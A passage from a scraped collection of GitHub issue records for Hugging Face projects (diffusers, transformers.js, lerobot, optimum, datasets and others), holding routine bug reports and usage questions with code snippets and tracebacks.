vae.decode(zi_t / vae.config.scaling_factor)\r\n decode_rgb = decode_rgb['sample'].squeeze()\r\n\r\nAnd the results of different start_steps are as follow:[0, 5, 15 respectively]\r\n![frame_000940_pred_ddim_st_0](https://github.com/user-attachments/assets/31012f83-c477-4284-88bf-5b30077cb4d3)\r\n![frame_000940_pred_ddim_st_5](https://github.com/user-attachments/assets/bdea4e07-ab06-4ba9-a429-7546d7df06cb)\r\n![frame_000940_pred_ddim_st_15](https://github.com/user-attachments/assets/9f8f3eff-3589-4b82-8553-33e1b084da34)\r\n\r\nAnother wired thing is the decoder_rgb range is about [-2, 2], Shouldn't its range be [-1, 1] ?\r\nCurrently, I think the problem may lie in either the infer code or the scale of dataset\uff08about 5000 sets images so far\uff09. Can someone guide me on how to determine which part of the problem it is? \r\nAny suggestions and ideas will be greatly appreciated !!!!
", "url": "https://github.com/huggingface/diffusers/issues/9990", "state": "closed", "labels": [], "created_at": "2024-11-22T03:16:50Z", "updated_at": "2024-11-23T13:37:53Z", "user": "Marquess98" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 123, "title": "Querying PaliGemma VLMs", "body": "My collaborators and I are trying to use your very useful containers to deploy and use Google's PaliGemma models on GCS/Vertex. I was wondering what is the best way to query the model with images, especially if the images are stored locally? I see that there is an [example showing this for Llama Vision](https://github.com/huggingface/Google-Cloud-Containers/blob/main/examples/vertex-ai/notebooks/deploy-llama-vision-on-vertex-ai/vertex-notebook.ipynb) but it seems like you have to pass in the images as urls which may not be feasible for us..\r\n\r\nWe're getting some success by doing something like this, but unsure if that's the right way:\r\n\r\n```py\r\n\r\nimage_path = \"/PATH/rabbit.png\"\r\n\r\nwith open(image_path, \"rb\") as f:\r\n image = base64.b64encode(f.read()).decode(\"utf-8\")\r\n\r\nimage = f\"data:image/png;base64,{image}\"\r\n\r\noutput = deployed_model.predict(\r\n instances=[\r\n {\r\n \"inputs\":f\"![]({image})What is the animal wearing?\",\r\n \"parameters\":{\"max_new_tokens\": 100, \"do_sample\": False}\r\n }\r\n ]\r\n)\r\n#> space suit\r\n```\r\n\r\nPlease let me know if you need more details! Any assistance would be much appreciated!", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/123", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-21T14:52:41Z", "updated_at": "2024-12-04T16:31:01Z", "user": "kanishkamisra" }, { "repo": "huggingface/diffusers", "number": 9983, "title": "Using StableDiffusionControlNetImg2ImgPipeline Enable_vae_tiling(), seemingly fixed the patch is 512 x 512, where should I set the relevant parameters", "body": "```\r\npipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)\r\npipe = pipe.to(\"cuda\")\r\nprompt = \"a beautiful landscape photograph\"\r\npipe.enable_vae_tiling()\r\n```", "url": "https://github.com/huggingface/diffusers/issues/9983", "state": "closed", "labels": [], "created_at": "2024-11-21T09:21:24Z", "updated_at": "2024-12-02T08:32:52Z", "user": "reaper19991110" }, { "repo": "huggingface/datatrove", "number": 305, "title": "How to read text files", "body": "Hey all is there any text reader in the repo?\r\nI have text files where each line is a document/data sample.\r\n\r\nAre there any readers which can read these kind of files directly?", "url": "https://github.com/huggingface/datatrove/issues/305", "state": "open", "labels": [], "created_at": "2024-11-21T06:55:21Z", "updated_at": "2025-05-16T10:51:33Z", "user": "srinjoym-cerebras" }, { "repo": "huggingface/diffusers", "number": 9979, "title": "flux img2img controlnet channels error", "body": "### Describe the bug\r\n\r\nWhen I use flux's img2img controlnet for inference, a channel error occurs.\r\n\r\n### Reproduction\r\n```python\r\nimport numpy as np\r\nimport torch\r\nimport cv2\r\nfrom PIL import Image\r\nfrom diffusers.utils import load_image\r\nfrom diffusers import FluxControlNetImg2ImgPipeline, FluxControlNetPipeline\r\nfrom diffusers import FluxControlNetModel\r\nfrom controlnet_aux import HEDdetector\r\n\r\nbase_model = \"black-forest-labs/FLUX.1-dev\"\r\ncontrolnet_model = \"Xlabs-AI/flux-controlnet-hed-diffusers\"\r\ncontrolnet = FluxControlNetModel.from_pretrained(\r\n controlnet_model,\r\n torch_dtype=torch.bfloat16,\r\n use_safetensors=True,\r\n)\r\npipe = FluxControlNetImg2ImgPipeline.from_pretrained(\r\n base_model, controlnet=controlnet, torch_dtype=torch.bfloat16\r\n)\r\npipe.load_lora_weights(\"./toonystarkKoreanWebtoonFlux_fluxLoraAlpha.safetensors\")\r\n\r\npipe.enable_sequential_cpu_offload()\r\n\r\nhed = HEDdetector.from_pretrained(\"lllyasviel/Annotators\")\r\n\r\nimage_source = load_image(\"./03.jpeg\")\r\ncontrol_image = hed(image_source)\r\ncontrol_image = control_image.resize(image_source.size)\r\nif control_image.mode != 'RGB':\r\n control_image = control_image.convert('RGB')\r\ncontrol_image.save(f\"./hed_03.png\")\r\n\r\nprompt = \"bird, cool, futuristic\"\r\nimage = pipe(\r\n prompt,\r\n image=image_source,\r\n control_image=control_image,\r\n control_guidance_start=0.2,\r\n control_guidance_end=0.8,\r\n controlnet_conditioning_scale=0.5,\r\n num_inference_steps=50,\r\n guidance_scale=6,\r\n).images[0]\r\nimage.save(\"flux.png\")\r\n```\r\n### Logs\r\n\r\n```shell\r\n---------------------------------------------------------------------------\r\nRuntimeError Traceback (most recent call last)\r\nCell In[13], line 2\r\n 1 prompt = \"bird, cool, futuristic\"\r\n----> 2 image = pipe(\r\n 3 prompt,\r\n 4 image=image_source,\r\n 5 control_image=control_image,\r\n 6 control_guidance_start=0.2,\r\n 7 control_guidance_end=0.8,\r\n 8 controlnet_conditioning_scale=0.5,\r\n 9 num_inference_steps=50,\r\n 10 guidance_scale=6,\r\n 11 ).images[0]\r\n 12 image.save(\"flux.png\")\r\n\r\nFile /opt/conda/lib/python3.11/site-packages/torch/utils/_contextlib.py:115, in context_decorator..decorate_context(*args, **kwargs)\r\n 112 @functools.wraps(func)\r\n 113 def decorate_context(*args, **kwargs):\r\n 114 with ctx_factory():\r\n--> 115 return func(*args, **kwargs)\r\n\r\nFile /opt/conda/lib/python3.11/site-packages/diffusers/pipelines/flux/pipeline_flux_controlnet_image_to_image.py:924, in FluxControlNetImg2ImgPipeline.__call__(self, prompt, prompt_2, image, control_image, height, width, strength, num_inference_steps, timesteps, guidance_scale, control_guidance_start, control_guidance_end, control_mode, controlnet_conditioning_scale, num_images_per_prompt, generator, latents, prompt_embeds, pooled_prompt_embeds, output_type, return_dict, joint_attention_kwargs, callback_on_step_end, callback_on_step_end_tensor_inputs, max_sequence_length)\r\n 921 controlnet_cond_scale = controlnet_cond_scale[0]\r\n 922 cond_scale = controlnet_cond_scale * controlnet_keep[i]\r\n--> 924 controlnet_block_samples, controlnet_single_block_samples = self.controlnet(\r\n 925 hidden_states=latents,\r\n 926 controlnet_cond=control_image,\r\n 927 controlnet_mode=control_mode,\r\n 928 conditioning_scale=cond_scale,\r\n 929 timestep=timestep / 1000,\r\n 930 guidance=guidance,\r\n 931 pooled_projections=pooled_prompt_embeds,\r\n 932 encoder_hidden_states=prompt_embeds,\r\n 933 txt_ids=text_ids,\r\n 934 img_ids=latent_image_ids,\r\n 935 joint_attention_kwargs=self.joint_attention_kwargs,\r\n 936 return_dict=False,\r\n 937 )\r\n 939 guidance = (\r\n 940 torch.tensor([guidance_scale], device=device) if self.transformer.config.guidance_embeds else None\r\n 941 )\r\n 942 guidance = guidance.expand(latents.shape[0]) if guidance is not None else None\r\n\r\nFile /opt/conda/lib/python3.11/site-packages/torch/nn/modules/module.py:1511, in Module._wrapped_call_impl(self, *args, **kwargs)\r\n 1509 return self._compiled_call_impl(*args, **kwargs) # type: ignore[misc]\r\n 1510 else:\r\n-> 1511 return self._call_impl(*args, **kwargs)\r\n\r\nFile /opt/conda/lib/python3.11/site-packages/torch/nn/modules/module.py:1520, in Module._call_impl(self, *args, **kwargs)\r\n 1515 # If we don't have any hooks, we want to skip the rest of the logic in\r\n 1516 # this function, and just call forward.\r\n 1517 if not (self._backward_hooks or self._backward_pre_hooks or self._forward_hooks or self._forward_pre_hooks\r\n 1518 or _global_backward_pre_hooks or _global_backward_hooks\r\n 1519 or _global_forward_hooks or _global_forward_pre_hooks):\r\n-> 1520 return forward_call(*args, **kwargs)\r\n 1522 try:\r\n 1523 result = None\r\n\r\nFile /opt/conda/lib/python3.11/site-packages/accelerate/hooks.py:170, in add_hook_to_module..new_forward(", "url": "https://github.com/huggingface/diffusers/issues/9979", "state": "closed", "labels": [ "bug", "good first issue", "help wanted", "contributions-welcome" ], "created_at": "2024-11-21T03:39:12Z", "updated_at": "2025-04-23T20:43:51Z", "comments": 10, "user": "wen020" }, { "repo": "huggingface/diffusers", "number": 9976, "title": "ControlNet broken from_single_file", "body": "### Describe the bug\r\n\r\ncontrolnet loader from_single_file was originally added via #4084\r\nand method `ControlNet.from_single_file()` works for non-converted controlnets.\r\n\r\nbut for controlnets in safetensors format that contain already converted state_dict, it errors out.\r\n\r\nits not reasonable to expect from user to know what is the internal dict structure of the controlnet safetensors file \r\nbefore he can use it.\r\n\r\neven worse, some of the newer controlnets are distributed as single-file-only and are already in diffusers format \r\nwhich makes them impossible to load in difufsers.\r\nfor example: \r\n\r\nthis issue was already mentioned several times, each time closed as \"works as designed\" \r\nwhen in reality its just a failure that should be addressed as an issue. \r\nsee #8474 #9208 #8614 as examples of previous issues\r\n\r\n### Reproduction\r\n\r\nscenario-1: works with non-converted controlnet\r\n```python\r\nimport torch\r\nfrom diffusers import ControlNetModel\r\nfrom huggingface_hub import hf_hub_download\r\nlocal_path = hf_hub_download(repo_id='Aptronym/SDNext', filename='ControlNet11/controlnet11Models_canny.safetensors')\r\ncn = ControlNetModel.from_single_file(local_path, torch_dtype=torch.float16)\r\nprint(cn.__class__)\r\n```\r\n\r\nscenario-1: fails for majority of controlnets available on huggingface\r\n```python\r\nimport torch\r\nfrom diffusers import ControlNetModel\r\nfrom huggingface_hub import hf_hub_download\r\nlocal_path = hf_hub_download(repo_id='lllyasviel/sd_control_collection', filename='diffusers_xl_canny_small.safetensors')\r\ncn = ControlNetModel.from_single_file(local_path, torch_dtype=torch.float16)\r\nprint(cn.__class__)\r\n```\r\ninitial failure is nonsense\r\n> OSError: stable-diffusion-v1-5/stable-diffusion-v1-5 does not appear to have a file named config.json.\r\n\r\nwhats making this worse is that SD15 and SDXL share the same `ControlNet` class which causes some\r\nconfusion on the base repo where to lookup config.\r\ne.g,, here we're loading SDXL controlnet and error referrs to SD15 repo.\r\n\r\nanyhow, trying to force correct config:\r\n```py\r\ncn = ControlNetModel.from_single_file(local_path, torch_dtype=torch.float16, config='diffusers/controlnet-canny-sdxl-1.0-small')\r\n```\r\n\r\nresults in even worse nonsense failure during loading of state_dict:\r\n> TypeError: is_floating_point(): argument 'input' (position 1) must be Tensor, not NoneType\r\n\r\n### System Info\r\n\r\ndiffusers=0.32.0.dev0\r\npython==3.12.3\r\ntorch==2.5.1+cu124\r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @sayakpaul @DN6 @asomoza", "url": "https://github.com/huggingface/diffusers/issues/9976", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-20T13:46:14Z", "updated_at": "2024-11-22T12:22:53Z", "comments": 7, "user": "vladmandic" }, { "repo": "huggingface/lerobot", "number": 515, "title": "ACT is working, but not Diffusion", "body": "Hello Team,\r\n\r\nyour work is so good, I am currently working on creating some nice policies with Lerobot repo, architecture and software. I tried ACT on my robot, it is working fine, able to execute the tasks what it learnt in the evaluation. \r\nI tried training Diffusion policy, multiple times with different params and also the default params, what you provided in the repo. I tried PushT in colab, its working but not in robot. Can you please explain why its not working, or should I change other things??\r\nI forgot to mention, I used 3 cameras for data collection and training for Diffusion\r\nThank you\r\n\r\n\r\nEDIT (aliberts): format", "url": "https://github.com/huggingface/lerobot/issues/515", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2024-11-19T18:58:28Z", "updated_at": "2025-11-30T02:37:09Z", "user": "Kacchan16" }, { "repo": "huggingface/transformers.js", "number": 1042, "title": "how can i pass embeddings or context to a text2text-generation model", "body": "### Question\n\nI downloaded the model to local. I found that there doesn't seem to be an API that allows me to pass embeddings. How can I make this model understand the context?\r\n\r\nThen I tried to pass the context content to this model, but the model didn't seem to accept it and output the following words.\r\n\r\nThe code is like the following:\r\n```js\r\nconst model =await pipeline(\"text2text-generation\", \"LaMini-Flan-T5-783M\")\r\nconst result = await model(\"you are a teacher, who are you?\",{})\r\n```\r\n\r\nthis is model output\r\n\r\n```json\r\n[\r\n {\r\n \"generated_text\": \"As an AI language model, I am not a teacher.\"\r\n }\r\n]\r\n\r\n```\r\nI don't know whether it's due to the model itself or that I just haven't found the API for passing the context\ud83d\ude15\r\n", "url": "https://github.com/huggingface/transformers.js/issues/1042", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-19T18:32:45Z", "updated_at": "2024-11-20T05:34:45Z", "user": "electroluxcode" }, { "repo": "huggingface/transformers.js", "number": 1041, "title": "Full preload example", "body": "### Question\r\n\r\nHello!\r\n\r\nI'm looking for a full \"preload model\" nodejs example.\r\n\r\nSay I do this:\r\n\r\n```ts\r\nimport { env } from '@huggingface/transformers';\r\nenv.allowRemoteModels = false;\r\nenv.localModelPath = '/path/to/local/models/';\r\n```\r\n\r\nhow do I \"get\" the model to that path? I want to download it when building my docker image", "url": "https://github.com/huggingface/transformers.js/issues/1041", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-19T12:34:04Z", "updated_at": "2024-11-26T12:44:55Z", "user": "benjick" }, { "repo": "huggingface/transformers.js", "number": 1038, "title": "script.convert tfjs model to onnx support", "body": "### Question\n\nI'm using tfjs-node to create an image-classifier model; \r\nbut I'm stuck with how to convert model.json to a format that can be used by optimum or script.convert to convert it to a onnx file.\r\n\r\nI'm able to convert to a graph model using \r\n```\r\ntensorflowjs_converter --input_format=tfjs_layers_model \\ --output_format=tfjs_graph_model \\ ./saved-model/layers-model/model.json \\ ./saved-model/graph-model\r\n```\r\n\r\nand then I can convert to an onnx using \r\n```\r\npython3 -m tf2onnx.convert --tfjs ./saved-model/graph-model/model.json --output ./saved-model/model.onnx\r\n```\r\n\r\nThis works fine when I test in python but I'm unable to use in transformers.js - I probably need to use optimum to convert it?\r\nI tried a number of approaches but was unable to convert to onnx - I then saw script.convert but am having difficulties\r\n\r\n- This is an example of the code I'm using to test the model with\r\n```\r\nimport onnxruntime as ort\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\n# Load the ONNX model\r\nsession = ort.InferenceSession('./saved-model/model.onnx')\r\n\r\n# Get input and output names\r\ninput_name = session.get_inputs()[0].name\r\noutput_name = session.get_outputs()[0].name\r\n\r\n# Load and preprocess the image\r\nimg = Image.open('./training_images/shirt/00e745c9-97d9-429d-8c3f-d3db7a2d2991.jpg').resize((128, 128))\r\nimg_array = np.array(img).astype(np.float32) / 255.0 # Normalize pixel values to [0, 1]\r\nimg_array = np.expand_dims(img_array, axis=0) # Add batch dimension\r\n\r\n# Run inference\r\noutputs = session.run([output_name], {input_name: img_array})\r\nprint(f\"Inference outputs: {outputs}\")\r\n\r\n```\r\n\r\n[Uploading model.onnx.txt\u2026]()\r\n\r\nAny guidance on how to go from tfjs model.json to onnx supported by transformers.js would really help me out.\r\nThanks! \r\n", "url": "https://github.com/huggingface/transformers.js/issues/1038", "state": "open", "labels": [ "question" ], "created_at": "2024-11-18T15:42:46Z", "updated_at": "2024-11-19T10:08:28Z", "user": "JohnRSim" }, { "repo": "huggingface/chat-ui", "number": 1573, "title": "Include chat-ui in an existing React application", "body": "Hello,\r\n\r\nIs it possible to integrate / embed chat-ui in an existing application, like a React component?\r\nFor example, to add a chat module to an existing website with the UI of chat-ui.\r\n\r\nAs is the case with Chainlit : https://docs-prerelease.chainlit.io/customisation/react-frontend", "url": "https://github.com/huggingface/chat-ui/issues/1573", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-11-18T14:11:58Z", "updated_at": "2024-11-18T14:15:17Z", "comments": 0, "user": "martin-prillard" }, { "repo": "huggingface/optimum", "number": 2097, "title": "TFJS support model.json to ONNX conversion", "body": "### Feature request\n\nCurrently using node to create an image-classifier model.json with tfjs \r\n- I don't think Optimum support this format to convert to onnx?\r\n\r\nIt would be nice to just use optimum and point to model.json.\r\n\n\n### Motivation\n\nCurrently I'm creating the model converting it to graph and then converting to onnx like this - \r\n\r\n```\r\ntensorflowjs_converter --input_format=tfjs_layers_model \\ --output_format=tfjs_graph_model \\ ./saved-model/layers-model/model.json \\ ./saved-model/graph-model\r\n```\r\n\r\n```\r\npython3 -m tf2onnx.convert --tfjs ./saved-model/graph-model/model.json --output ./saved-model/model.onnx\r\n```\r\n\r\nI'm not sure how to switch to use optimum - do I need to convert model.json to .h5 and then run? \r\n- if I try this I run into huggingface_hub.errors.HFValidationError: Repo id must be in the form 'repo_name' or 'namespace/repo_name': './path_to_save/model.h5'. Use `repo_type` argument if needed\r\n\r\n\n\n### Your contribution\n\nN/A", "url": "https://github.com/huggingface/optimum/issues/2097", "state": "open", "labels": [ "exporters", "tflite" ], "created_at": "2024-11-18T12:55:05Z", "updated_at": "2024-11-19T10:22:35Z", "comments": 0, "user": "JohnRSim" }, { "repo": "huggingface/optimum-benchmark", "number": 294, "title": "How to Use a Local Model When Calling the Python API", "body": "![image](https://github.com/user-attachments/assets/ca4a11fc-29e5-4537-8e8a-95b309f43afe)\r\n", "url": "https://github.com/huggingface/optimum-benchmark/issues/294", "state": "closed", "labels": [], "created_at": "2024-11-18T06:36:24Z", "updated_at": "2024-12-09T12:23:30Z", "user": "WCSY-YG" }, { "repo": "huggingface/lerobot", "number": 511, "title": "Minimum Requirements - Running Policies in production/ Training Policies", "body": "I was wondering what types of hardware can policies trained using lerobot can run on. Lets say I wanted to run policies in production on say a raspberry pi. Is it possible to run training on beefier hardware and then deploy policies to lower-end hardware to run? Is it better to record with various cameras or just use the same camera? What is the minimum quality?\r\n\r\nYou have tutorials on training and evaluating policies but nothing about deploying to production. Would be interesting to see this. \r\n\r\nThank you\r\n\r\n", "url": "https://github.com/huggingface/lerobot/issues/511", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-17T17:34:50Z", "updated_at": "2025-04-07T16:23:41Z", "user": "rkeshwani" }, { "repo": "huggingface/transformers.js", "number": 1035, "title": "How can I implement partial output in the react demo?", "body": "### Question\n\nHello! I am reading the Transformers.js documentation for \"[Building a react application](https://huggingface.co/docs/transformers.js/tutorials/react)\", but I encountered an issue at [step 4](https://huggingface.co/docs/transformers.js/tutorials/react#step-4-connecting-everything-together). \r\nI don't know how to implement the **partial output** of the translation results, even though the documentation provides the following instructions:\r\n\r\n```javascript\r\n let output = await translator(event.data.text, {\r\n tgt_lang: event.data.tgt_lang,\r\n src_lang: event.data.src_lang,\r\n\r\n // Allows for partial output\r\n callback_function: x => {\r\n self.postMessage({\r\n status: 'update',\r\n output: translator.tokenizer.decode(x[0].output_token_ids, { skip_special_tokens: true })\r\n });\r\n }\r\n });\r\n```\r\n\r\nI have completed all the steps in the tutorial documentation, but I still cannot get the output to work properly. I tried using `console.log` for debugging and found that the `callback_function` is not working, and the main thread is not receiving any messages with the status `update`. I have also not found any information about the `callback_function` in the transformers.js documentation. I apologize for taking up your time, but I sincerely need your help. \ud83d\ude4f", "url": "https://github.com/huggingface/transformers.js/issues/1035", "state": "open", "labels": [ "question" ], "created_at": "2024-11-17T11:29:22Z", "updated_at": "2024-12-02T23:00:13Z", "user": "DikkooXie" }, { "repo": "huggingface/lerobot", "number": 510, "title": "Do we have to compulsory use trossen robotics robots for this repo?", "body": "Or any robot will work fine?\n\n\nAlso one more question.\n\nDo we have to use depth camera or simple camera will work fine?", "url": "https://github.com/huggingface/lerobot/issues/510", "state": "closed", "labels": [ "question", "robots" ], "created_at": "2024-11-17T11:14:52Z", "updated_at": "2025-04-07T16:27:40Z", "user": "hemangjoshi37a" }, { "repo": "huggingface/diffusers", "number": 9942, "title": "Unable to install pip install diffusers>=0.32.0dev", "body": "### Describe the bug\r\n\r\nI am installing the following version\r\npip install diffusers>=0.32.0dev\r\n\r\nHowever it does nothing\r\n```\r\n(c:\\aitools\\CogVideo\\cv_venv) C:\\aitools\\CogVideo>pip install diffusers>=0.32.0dev\r\n\r\n(c:\\aitools\\CogVideo\\cv_venv) C:\\aitools\\CogVideo>\r\n```\r\n\r\nI even uninstalled the previous version\r\n\r\n```\r\n(c:\\aitools\\CogVideo\\cv_venv) C:\\aitools\\CogVideo>pip uninstall diffusers\r\nFound existing installation: diffusers 0.31.0\r\nUninstalling diffusers-0.31.0:\r\n Would remove:\r\n c:\\aitools\\cogvideo\\cv_venv\\lib\\site-packages\\diffusers-0.31.0.dist-info\\*\r\n c:\\aitools\\cogvideo\\cv_venv\\lib\\site-packages\\diffusers\\*\r\n c:\\aitools\\cogvideo\\cv_venv\\scripts\\diffusers-cli.exe\r\nProceed (Y/n)? y\r\n Successfully uninstalled diffusers-0.31.0\r\n```\r\n\r\n### Reproduction\r\n\r\nCreate a conda environment and install using\r\n\r\n`pip install diffusers>=0.32.0dev`\r\n\r\nSo I understand it is not release here\r\nhttps://pypi.org/project/diffusers/#history\r\n\r\nHow do I install on Windows 11\r\n\r\nI even checked the branch\r\n\r\n![image](https://github.com/user-attachments/assets/219faa7c-951a-4c76-886a-376e69c87cee)\r\n\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nPython 3.11.10\r\nWindows 11\r\n\r\n### Who can help?\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9942", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-17T10:26:19Z", "updated_at": "2024-11-17T12:27:23Z", "comments": 0, "user": "nitinmukesh" }, { "repo": "huggingface/candle", "number": 2622, "title": "How to compute `Atan2` for tensors?", "body": "I am trying to implement DeepPhase in candle but I am struggling figuring out how to calculate the phase angles from two tensors using `atan2` operation.", "url": "https://github.com/huggingface/candle/issues/2622", "state": "open", "labels": [], "created_at": "2024-11-16T16:45:36Z", "updated_at": "2024-11-17T14:21:50Z", "user": "cryscan" }, { "repo": "huggingface/transformers.js", "number": 1032, "title": "How to identify which models will work with transformers.js?", "body": "### Question\n\nI've tried multiple models from MTEB dashboard (e.g. `jinaai/jina-embeddings-v3`, `jinaai/jina-embeddings-v2`, `dunzhang/stella_en_400M_v5`), but none of them work.\r\n\r\nIt's not clear which models will work?\r\n\r\n```ts\r\nconst generateGteSmallEmbedding = await pipeline(\r\n 'feature-extraction',\r\n 'dunzhang/stella_en_400M_v5',\r\n);\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/1032", "state": "open", "labels": [ "question" ], "created_at": "2024-11-15T22:13:00Z", "updated_at": "2024-12-22T02:41:43Z", "user": "punkpeye" }, { "repo": "huggingface/datasets", "number": 7291, "title": "Why return_tensors='pt' doesn't work\uff1f", "body": "### Describe the bug\n\nI tried to add input_ids to dataset with map(), and I used the return_tensors='pt', but why I got the callback with the type of List\uff1f\r\n![image](https://github.com/user-attachments/assets/ab046e20-2174-4e91-9cd6-4a296a43e83c)\r\n\n\n### Steps to reproduce the bug\n\n![image](https://github.com/user-attachments/assets/5d504d4c-22c7-4742-99a1-9cab78739b17)\n\n### Expected behavior\n\nSorry for this silly question, I'm noob on using this tool. But I think it should return a tensor value as I have used the protocol\uff1f\r\nWhen I tokenize only one sentence using tokenized_input=tokenizer(input, return_tensors='pt' )\uff0cit does return in tensor type. Why doesn't it work in map()\uff1f\n\n### Environment info\n\ntransformers>=4.41.2,<=4.45.0\r\ndatasets>=2.16.0,<=2.21.0\r\naccelerate>=0.30.1,<=0.34.2\r\npeft>=0.11.1,<=0.12.0\r\ntrl>=0.8.6,<=0.9.6\r\ngradio>=4.0.0\r\npandas>=2.0.0\r\nscipy\r\neinops\r\nsentencepiece\r\ntiktoken\r\nprotobuf\r\nuvicorn\r\npydantic\r\nfastapi\r\nsse-starlette\r\nmatplotlib>=3.7.0\r\nfire\r\npackaging\r\npyyaml\r\nnumpy<2.0.0\r\n", "url": "https://github.com/huggingface/datasets/issues/7291", "state": "open", "labels": [], "created_at": "2024-11-15T15:01:23Z", "updated_at": "2024-11-18T13:47:08Z", "comments": 2, "user": "bw-wang19" }, { "repo": "huggingface/speech-to-speech", "number": 141, "title": "\u4e0d\u60f3\u5b9e\u65f6\u5f55\u97f3\uff0c\u4f20\u4e00\u6bb5\u97f3\u9891\u600e\u4e48\u64cd\u4f5c\uff1fI don't want to record in real time, how can I upload an audio clip?", "body": "\u670d\u52a1\u5668\u4e0a\u542f\u52a8server\r\nwin10 \u672c\u5730\u542f\u52a8python listen_and_play.py \u540e\uff0c\u4e00\u4f1a\u6ca1\u5f55\uff0c\u670d\u52a1\u7aef\u5c31\u7ed3\u675f\u4e86\uff1f\uff1f\uff1f\r\n\u6211\u60f3\u4f20\u4e00\u6bb5\u97f3\u9891\u8ba9\u4ed6\u7ffb\u8bd1\u5e94\u8be5\u600e\u4e48\u641e", "url": "https://github.com/huggingface/speech-to-speech/issues/141", "state": "open", "labels": [], "created_at": "2024-11-15T03:58:26Z", "updated_at": "2024-12-20T04:30:13Z", "user": "dh12306" }, { "repo": "huggingface/diffusers", "number": 9930, "title": "[PAG] - Adaptive Scale bug", "body": "### Describe the bug\r\n\r\nI am looking for the purpose of the PAG adaptive scale? Because I was passing a value in it, for example 5.0, and passing 3.0 in the PAG scale, according to the implemented code we will have a negative number and the scale will return 0 and the PAG will not be applied and I did not find an explanation about this parameter in the documentation. \r\n\r\nSo i found it on an ComfyUI documentation: \"_This dampening factor reduces the effect of PAG during the later stages of the denoising process, speeding up the overall sampling. A value of 0.0 means no penalty, while 1.0 completely removes PAG_\"\r\n\r\nThen I realized that I was passing values \u200b\u200babove 1.0, however when I pass values \u200b\u200bof 0.2 it is enough for it not to apply the PAG. I suspect this could be a problem.\r\n\r\nIf you run the code below, you will see that in the third image where I pass a scale of 0.2 in adaptive_scale it practically invalidates the PAG in the first generation steps.\r\n\r\nI propose a possible solution:\r\n\r\nAfter this code:\r\nhttps://github.com/huggingface/diffusers/blob/5c94937dc7561767892d711e199f874dc35df041/src/diffusers/pipelines/pag/pag_utils.py#L93\r\n\r\nWe can change for:\r\n```python\r\nif self.do_pag_adaptive_scaling: \r\n signal_scale = self.pag_scale\r\n if t / self.num_timesteps > self.pag_adaptive_scale:\r\n signal_scale = 0\r\n return signal_scale\r\nelse:\r\n return self.pag_scale\r\n```\r\nAnd inside every PAG pipeline, we need change \"t\" variable for \"i\" variable is passed with param on this function, to receive the number of current step.\r\n\r\nhttps://github.com/huggingface/diffusers/blob/5c94937dc7561767892d711e199f874dc35df041/src/diffusers/pipelines/pag/pipeline_pag_sd_xl.py#L1253\r\n\r\nWith this, the logic will not be that the higher the adaptive scale value, the faster the PAG will be disabled, but quite the opposite. The scale will tell you exactly at what point in the process the PAG will be disabled. If the scale exceeds 0.5 in a 30-step generation, the PAG will be disabled from step 15 onwards. The scale applied will be the same until the moment of the cut and will not be a variable scale.\r\nI don't know if this was the original purpose of this parameter, but it works well for me.\r\n\r\n\r\n\r\n\r\n### Reproduction\r\n\r\n```python\r\nfrom diffusers import AutoPipelineForText2Image\r\nimport torch\r\n\r\ndevice = \"cuda\"\r\n\r\npipeline_sdxl = AutoPipelineForText2Image.from_pretrained(\r\n \"stabilityai/stable-diffusion-xl-base-1.0\",\r\n enable_pag=True,\r\n pag_applied_layers=[\"mid\"],\r\n torch_dtype=torch.float16\r\n).to(device)\r\n\r\npipeline = AutoPipelineForText2Image.from_pipe(pipeline_sdxl, enable_pag=True).to(device)\r\npipeline.enable_vae_tiling() \r\npipeline.enable_model_cpu_offload()\r\n\r\nprompt = \"an insect robot preparing a delicious meal, anime style\"\r\n\r\nfor i, pag_scale in enumerate([0.0, 3.0, 3.0]):\r\n generator = torch.Generator(device=\"cpu\").manual_seed(0)\r\n images = pipeline(\r\n prompt=prompt,\r\n num_inference_steps=25,\r\n guidance_scale=7.0,\r\n generator=generator,\r\n pag_scale=pag_scale,\r\n pag_adaptive_scale=0.0 if i < 2 else 0.2\r\n ).images[0]\r\n images.save(f\"./data/result_pag_{i+1}.png\")\r\n\r\n```\r\n\r\n### Logs\r\n\r\n```shell\r\nN/A\r\n```\r\n\r\n\r\n### System Info\r\n\r\n- \ud83e\udd17 Diffusers version: 0.32.0.dev0\r\n- Platform: Linux-5.15.153.1-microsoft-standard-WSL2-x86_64-with-glibc2.35\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.11\r\n- PyTorch version (GPU?): 2.4.0+cu121 (True)\r\n- Flax version (CPU?/GPU?/TPU?): 0.10.1 (cpu)\r\n- Jax version: 0.4.35\r\n- JaxLib version: 0.4.35\r\n- Huggingface_hub version: 0.26.2\r\n- Transformers version: 4.46.2\r\n- Accelerate version: 1.1.1\r\n- PEFT version: 0.13.2\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: 0.0.27.post2\r\n- Accelerator: NVIDIA GeForce RTX 3060 Ti, 8192 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n### Who can help?\r\n\r\n@yiyixuxu , @asomoza ", "url": "https://github.com/huggingface/diffusers/issues/9930", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-11-15T02:00:19Z", "updated_at": "2024-12-15T15:03:05Z", "comments": 1, "user": "elismasilva" }, { "repo": "huggingface/safetensors", "number": 541, "title": "[Question] Safetensors seem to block the main thread -- but torch.save does not?", "body": "I have the following code in my training loop:\r\n```\r\n if rank == 0:\r\n t = Thread(\r\n target=save_file,\r\n args=(model_sd, f\"{cfg.model_dir}/model_{step + 1}.safetensors\"),\r\n daemon=True\r\n )\r\n t.start()\r\n```\r\nWhich saves the checkpoint to disk using safetensors. However, I notice that this 